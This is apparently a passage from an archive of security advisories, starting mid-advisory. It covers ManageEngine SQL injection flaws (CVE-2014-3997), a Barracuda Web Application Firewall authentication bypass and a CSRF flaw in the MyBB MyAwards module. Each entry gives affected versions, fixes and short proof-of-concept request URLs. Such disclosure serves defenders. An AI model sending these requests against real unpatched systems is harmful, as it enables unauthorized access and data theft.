- ManageEngine Desktop Central (DC) [MSP]: all versions from v4 up to v9 build 90033
- ManageEngine Password Manager Pro (PMP) [MSP]: all versions from v5 to version 7 build 7002
- ManageEngine IT360 [MSP]: all versions from v8 to v10.1.1 build 10110
This affects all versions of the products released since 19-Apr-2006. Other ManageEngine products might be affected.
Fix: Upgrade to DC v9 build 90043; PMP v7 build 7003; IT360 v10.3.3 build 10330
Constraints:
- DC: no authentication or any other information needed
- PMP: no authentication or any other information needed
- IT360: valid user account needed
Proof of concept:
DC / PMP:
GET /LinkViewFetchServlet.dat?sv=[SQLi]
IT360:
GET /console/LinkViewFetchServlet.dat?sv=[SQLi]
#2
Vulnerability:
Blind SQL injection in MetadataServlet (unauthenticated on PMP / authenticated on IT360)
CVE-2014-3997
Affected products / versions:
- ManageEngine Password Manager Pro (PMP) [MSP]: all versions from v5 to version 7 build 7002
- ManageEngine IT360 [MSP]: all versions from v8 to v10.1.1 build 10110
This affects all versions of the products released since 03-Apr-2008. Other ManageEngine products might be affected.
Fix: Upgrade to DC v9 build 90043; PMP v7 build 7003; IT360 v10.3.3 build 10330
Constraints:
- PMP: no authentication or any other information needed
- IT360: valid user account needed
Proof of concept:
PMP:
GET /MetadataServlet.dat?sv=[SQLi]
IT360:
GET /console/MetadataServlet.dat?sv=[SQLi]
================
Agile Information Security Limited
http://www.agileinfosec.co.uk/
>> Enabling secure digital business >>
source: https://www.securityfocus.com/bid/69028/info
Barracuda Web Application Firewall is prone to an authentication-bypass vulnerability.
An attacker can exploit this issue to bypass the authentication mechanism and gain access to the appliance. This may aid in further attacks.
Barracuda Web Application Firewall 7.8.1.013 is vulnerable; other versions may also be affected.
http://www.example.com/cgi-mod/index.cgi?auth_type=Local&et=99999999996locale=en_US&password=5a2fd48b65c5d80881eeb0f738bcc6dc&primary_tab=SECURITY%20POLICIES&secondary_tab=request_limits&user=guest
source: https://www.securityfocus.com/bid/69386/info
MyAwards module for MyBB is prone to a cross-site request-forgery vulnerability.
An attacker may exploit this issue to perform certain unauthorized actions. This may lead to further attacks.
Versions prior to MyAwards 2.4 are vulnerable.
https://www.example.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awid=1&awuid=2
https://www.example.com/forum/admin/index.php?module=user-awards&action=awards_delete_user&id=1&awuid=1